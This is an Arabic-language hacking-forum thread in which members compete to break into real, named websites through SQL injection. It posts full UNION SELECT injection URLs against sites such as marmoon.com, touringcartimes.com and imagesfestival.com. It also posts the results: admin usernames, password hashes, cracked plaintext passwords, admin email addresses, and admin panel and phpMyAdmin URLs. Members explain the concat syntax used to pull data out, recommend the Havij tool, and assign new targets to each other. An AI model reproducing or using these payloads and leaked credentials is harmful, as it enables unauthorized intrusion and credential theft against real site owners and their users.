![]() |
اقتباس:
اي والله اعجبني هالموقع (كتر منن)هههههه مشكور |
خرجت خارجا ل 3 ساعات ويبدو أنه فاتني الكثير من التشويق |
الحقنة الكاملة + id ههههههههههههههههههههه للتأكد فقط كود: http://www.marmoon.com/pregames.php?id=-383 UNION SELECT 1,2,3,group_concat(id,0x3a,admin,0x3a,pass),5,6,7,8,9,10,11,12,13+from+admin-- كود: ps_customer:passwd:cartnana كود: ************************ id= 1 admin = admin pass=asdfgh وننتظر الهدف الجديد |
d4rK-h4ck3r أحي العزيز ما فائدة هذا الأمر كود: concat(0x3a3a3a3a3a,Host,0x3a,User,0x3a,Password,0x3a3a3a3a3a) + أخي الكريم ما فائدة الأمر concat_ws و 0x3a في بداية الأمر بين المزدوجتين ولماذا كتب مرة واحدة كود: concat_ws(0x3a,id,user,parola) |
الله يعطيك العافية اخي ooooo_darkman_ooooo ☻ على الحقنة انا حاولت اخذ بيانات الأعضاء والايميلات وكانت النتيجة كالتالي: اولا: من الجدول pm_users:password:melody16 مع اضافة السيجما الى الاستغلال الأعمدة: pm_users:id:melody16 pm_users:username:melody16 pm_users:password:melody16 pm_users:name:melody16 pm_users:gender:melody16 pm_users:country:melody16 pm_users:reg_ip:melody16 pm_users:reg_date:melody16 pm_users:last_signin:melody16 pm_users:email:melody16 pm_users:favorite:melody16 pm_users:power:melody16 pm_users:about:melody16 pm_users:av الحقنة: http://www.marmoon.com/pregames.php?id=-38 union select 1,2,3,group_concat(id,0x3a,username,0x3a,password, 0x3a,email),5,6,7,8,9,10,11,12,13+from+melody16.pm _users-- وجدت عضوين في هذا الجدول (الغريب ان احدهما اسمه ادمن)!! البيانات الاول: admin 91477f9990ca6e6727c3961b0f1ed7ec your@email.com binary98 كلمة السر بعد فك التشفير الثاني: ( بات مان ) هههه batman99 d8578edf8458ce06fbc5bb76a58c5ca4 emark.s@gmail.com qwerty كلمة السر بعد فك التشفير جربت فوت على الايميل بس مو نفس كلة السر☺ ______________________ ثانبا: من الجدول:wp_users:user_pass:nananature من وضع السيجما في الرابط الأعمدة: wp_users:ID:nananature wp_users:user_login:nananature wp_users:user_pass:nananature wp_users:user_nicename:nananature wp_users:user_email:nananature wp_users:user_url:nananature wp_users:user_registered:nananature wp_users:user_activation_key:nananature wp_users:user_status:nananature wp_users:display_name:nananature wp_users:ID:wpdrama,wp الحقنة: http://www.marmoon.com/pregames.php?...ure.wp_users-- وجدت عضو واحد في الجدول وكمان اسمه ادمن!!! البيانات: admin $P$B8ky.p7DHHXJj3UvebuboIyKiJ9IyS. اطن sh1 admin@nana-nature.com اخيرا لوحة التحكم http://www.marmoon.com/admin بس ما قبلت بيانات الادمن (ياشباب والله بدنا حل لهذه المشكلة يعني صرت جايب ادمن كذا..... موقع بس ما يقبل يدخل لوحة الادارة بس الاعضاء بيدخلو معي للموقع وما بستفاد شي هههه) بدي اعرف يعني كم ادمن في الموقع صارو 3... :a02: والخير لقدام هههه الله يعطيك العافية اخي والاخوة جميعهم. smilies14 |
[align=center]الهدف الجديد : http://www.touringcartimes.com/news.php?id=4311 هذا اعتقد راح يكون ممل شوي لذلك راح اضيف هدف ثاني معاه للي ما قدر يحقن الاول يحقن الثاني الهدف الثاني : http://www.vfs.com/news.php?id=7&news_id=362 بالتوفيق تحياتي [/align] |
عبد الله ر يعطيك الصحة أخي العزيز جاري تقييمك على العمل اللذي تقوم به |
Master vbspiders جاري بعد العودة في الليل بإذن الله |
[align=center]شكرا أخي على المواقع تم الحقن و لكن لدي ما أقوله لا أعرف لماذا لا يمكن حقنهما يدويا لأن عدد الأعمدة لا ينتهي يظهر كأن الثغرة مرقعة في الموقع الأول و لكن من خلال البرنامج يمكن حقنه و هذه معلومات الموقع الأول : الأدمن : admin الباسوارد : $P$BfX83P0hDuIl3OXTM.44dGAATde1bB. نوع التشفيرة : MD5/UNIX و تقريبا هذا النوع يمكنك فكه من خلال التخمين أقصد من خلال البرامج مثل PasswordPro لأنو لا توجد مواقع لفك هذا النوع من الهاش ( لم أرى بنفسي موقع يفعل هذا ) إيميل الأدمن : rob.veltman@touringcartimes.com phpmyadmin : http://www.touringcartimes.com/phpmyadmin/ بالنسبة للموقع الثاني هناك حماية على السيرفر و لا أعرف كيف تمكنت أنت من حقنه بالتوفيق[/align] |
اقتباس:
الرمز 0x3a هو عبارة عن فاصلة لكن عندما تضيف 0x3a3a تصبح فاصلتين و هكذا exemple concat(id,0x3a,passs) resultat admin:admin mais si vous ajoutez 0x3a3a concat(id,0x3a3a,passs) resultat admin::admin بخصوص الاستعلام concat_ws هو نفسه concat لكن بدل ما نكتب الفاصلة 0x3a وسط الاستغلال نضع _ws و الفاصلة في البداية c'est t-a dire concat_ws(0x3a,id,user,parola) هي نفسها concat(id,0x3a,user,0x3a,parola) الى الأمام دائما....^_^ |
اقتباس:
[align=center]اعتذر هذه المرة وضعت المواقع وخرجت بدون التاكد بانها صالحة للحقن... + بالنسبة لوضع الاهداف انا اعتذر عن هذه المهمة تقدر من الان انت والاخوة ان تحددو الاهداف الجديدة تحياتي [/align] |
هذا أجمل شئ سمعته هذا اليوم. |
m0h@med شكرا أخي m0h@med على التوضيح و الله أفدتني بخصوص concat_ws كثيرا وكذلك رمز الفاصلتين يعني أحسن مانكتب 0x3a مرتين نكتبها 0x3a3a |
اقتباس:
|
الهدف الجديد كود: www.imagesfestival.com |
تم تقييم كل من الإخوة Master vbspiders m0h@med Syst3m-32 عبد الله ر smilies12 :a04: |
اقتباس:
أخي الكريم هل حقنت أنت هذا الموقع ؟؟؟ لأنو إصدار القاعدة 4 و خمنت أكثر من 600 إسم للجدول و لا جدوى إن كنت لم تحقنه يا غالي فتذكر ما قلنا لازم قبل أن نضع هدف أن نحقنه ليس موقع لم نستطع حقنه نضعه، لأنو ممكن عضو جديد ما يقدر يحقن فيكره ال SQL لكن لما نكون حقناه نعطيه الحل و يستفيد |
حقنتو يا غالي Syst3m-32 ويدويا |
اقتباس:
ولو هذا واجبنا بالنسبة للموقع : www.imagesfestival.com والله انا حاولت اخمن اسم الجدول بس ما طلع معي مع انني جربت كتتتتتيييير.....هههه بس والله من رأي انك تضع جدول التخمين اللي بتشتغل انت عليه او الطريقة التي تستعملها ليستفاد منها الجميع ولكن بعد ان يحاول الجميع فيه ويجرب الكل عليه بالاول مشكور على التقييم بالنسبة للأخ Syst3m-32 ياريت تقلنا بأي برنامج حقنت الموقع لاني بصراحة ما جربت استعمل اي برنامج للحقن قبل الان الشي الوحيد اللي احيانا بستعملو هو شريط الهاك للفايرفوكس مشان الامر union select اذا كان عدد الاعمدة كتير ومشان تشفير كلمة %pass% فقط ومن اجل ان اعرف القليل عن فائدة هذه البرامج وكيف تساعد في الاختراق مشكووووور |
يا دارك لوول ليش ما قلت لي أنه WordPress ؟؟؟ جعلتني أظهر كأنني لم أستطع حقن الموقع لوول تم الحقن بنجاح بعد معرفة السكربت WordPress لوول إسم الجدول : wp_users إسم عمود اليوزر : user_login إسم عمود الباسوارد : user_pass يوزر الأدمن : admin باسوارده : $P$BKVumgDn3YBBmuENaVRIHGq9yEV1QN1 بالمناسبة الباسوارد مشفر تشفيرة MD5-WordPress و هذه الحقنة كاملة : كود: http://www.imagesfestival.com/volunteer.php?id=-6%20UNION%20SELECT%201,2,concat%28user_login,0x3a,user_pass%29,4,5,6,7,8+from+wp_users-- بالتوفيق |
system-32 هههههههههههههههههههههههههههههههههههههه الحمد لله أنك قمت بالتذكر هههههههههههههههههههههههه عندي 1 ساعة و أنا أنتظر تقولهالي ههههههههههههههههههههههههههههههه لكن في النهاية قمت بالمطلوب يا خبير تستاهل تكون مشرف ههههههههههههههههههههه واصل العمل + عمل ممتاز + أنا حقنت الموقع لكن و الله ما عرفت أنو مركب سكربت wordpress ههههههههههههههه لكني حقنته من الخبير الآن هههههههههههههههههههههههههههههه |
اقتباس:
أهلا أخي الكريم بصراحة و الله العظيم أنا لا أعمل ببرامج الحقن أعتمد بنسبة 90% على الحقن اليدوي فقط في بعض الحالات أين يصعب الحقن اليدوي و ما يقارب 10% بالنسبة للبرنامج الذي أعمل به هو : Havij 1.10 برنامج قوي الأكثر شهرة في هذا المجال و بصراحة من جهتي هو برنامج قوي جدا و رائع إلى أن في بعض الحالات الحقن اليدوي يغلبه كالحالة التي قبل هذه المشاركة بالضبط و أي مساعدة أنا هنا بالتوفيق |
Syst3m-32 ============= هل عرفت أن السكربت وورد بريس من إسم الجدول أم ماذا ؟؟؟؟؟؟؟؟ |
أخي system-32 لاحظ حقنة المحترفين وقولي ماهو الشيئ المضاف على حقنتك من حيث ناتج الإستعلامات ههههههههههههههههههههههههههههه كود: http://www.imagesfestival.com/call.php?id=-8%20union%20select%201,2,3,4,5,6,7,8,concat%28user_login,0x3a,0x3a,user_pass%29,10,11%20from%20wp_users-- |
اسف يا شباب والله انا جربت اسم الجدول wp_users من الاول بس باظاهر اني كنت مخطئ خطئ صغير داخل استعلام الـ union select بعد ما رجعت للهيستوري لقيت حالي مخربط بكتابة احد الفواصل اسف جدا جاري متابعة التخمين |
بالنسبة للموقع الجديد هذا هو وهو مصاب بثغرة سيكول و أنا جبت رابط لوحة التحكم و اليوزر و الباس وهو موقع صيني هههههههههههههههههههههههههه خلينا ننوع شوية السلعة ههههههههههههههههههههههههههههههه وهو مهدى للإخوة اللي قيمتهم قبيلة في التقييم نتاعهم كود: www.phpaa.cn |
لا بأس أخي عبد الله ر سيب راحتك |
اقتباس:
حقنة محترفين ؟؟؟ آسف أخي و لكنك مخطئ بهذه الكلمة الفرق الوحيد بين حقنتي و حقنتك حبيبي هو أنك أنت ذهبت إلى ملف مصاب إسمه ( call.php ) و أنا ذهبت إلى ملف مصاب آخر إسمه ( volunteer.php ) و المتغير هو نفسه بالتوفيق |
انا لاحظت من حقنتك انك استعملت ملف call.php في الحقنة الذي به 11 عمود مصاب بس عند ملف اخر مثل volunteer.php في الحقن الذي به 8 عمدو مصاب لم تطهر بقية البيانات طيب ليش !!! |
اقتباس:
لأنو هو إستعمل ملف و أنا ملف |
اقتباس:
ههههههههههههههههههههههههههههههههههههههههههههههههه كما توقعت تماما علمت أنك ستقول هذا هههههههههههههههههههههههه :666: أنا جربت على عدة ملفات مصابة عندما كان الموقع مصاب حقا يعني عيان الآن قامو بتطويره و غيرو الخلفية وقامو بغلق الثغرات ربما لأن الموقع لا يتغير مساره في عنوان الموقع في المتصفح عند التصفح وهاته الميزة لم تكن عندما حقنت الموقع أول مرة smilies7 شكرا خويا system-32 |
هل من جديد حول الهدف الصيني لأنو الظاهر أنو طارت السيكول من راسي هههههههههههههههههههههههههههههههههههه |
هذا الشي له معنى وهو : عند حقن الاصدار الرابع عليك بتجربة اكثر من ملف اثناء المحاولة لاستخراج بقية البيانات . شكرا لك اخي ooooo_darkman_ooooo على هذه المعلومة اللي حاولت توصلنا اياها بشكل غير مباشر هههه. |
أخ عبد الله ر أنا وجدت هذا الشيئ تقريبا مع كل المواقع اللي حقنتها و كل ملف يعطيك عدد أعمدة مختلف ...........إلخ و أنت تعرف الباقي و العلم لله |
المهم ...! بالنسبة للموقع الصيني جاري الحقن لكن ليش تحب تتعبنا ؟؟؟ لازم أستهدفه لأنك لم تضع الملف المصاب :( المهم جاري تحميل البرنامج و كشف الملف المصاب و أي شرح أنا هنا لوول بالتوفيق |
حبيت نزيدو شوية في ال level خويا system-32 لأننا في نفس الروتين ملي بدا هذا الموضوع لازم كل 2 أو 3 أيام نزيدو ال level ههههههههههههههههههههههههههههههههههههههه |
اقتباس:
قصدك اي برنامج معلش ح نتعبك معنا شوي هههههههه ان شاء الله قريبا جدا سوف اضع لكم هدف جديد بس حيكون سهل بإذن الله ههه |
لا ما نريد السهل لوول أنا أنتظر لما تكملوا أضع لكم موقع شيب الرأس يظهر ( أمزح هه ) المهم...! بالنسبة للبرنامج يا غالي هذا البرنامج يقوم بفحص الموقع و يستخرج لك كل ملفاته و منه أنت و شطارتك في إكتشاف الملف المصاب و الجميل في البرنامج أنه يضع لك المتغيرات أيضا يعني فقط تضغط ( فتح بالمتصفح ) إن لم تفهمني وعد مني راح أضع شرح عنه في القريب العاجل فيديو بالتوفيق |
اقتباس:
ههههههههههههههههههههههههههههههههههههههه :37: |
آسف أخي و الله لم أبدأ بعد أولا بسبب النت الثقيلة و ثانيا عندي هاشات أفكها فقط دقائق و أكون معكم |
الساعة الآن 02:56 PM |
[ vBspiders.Com Network ]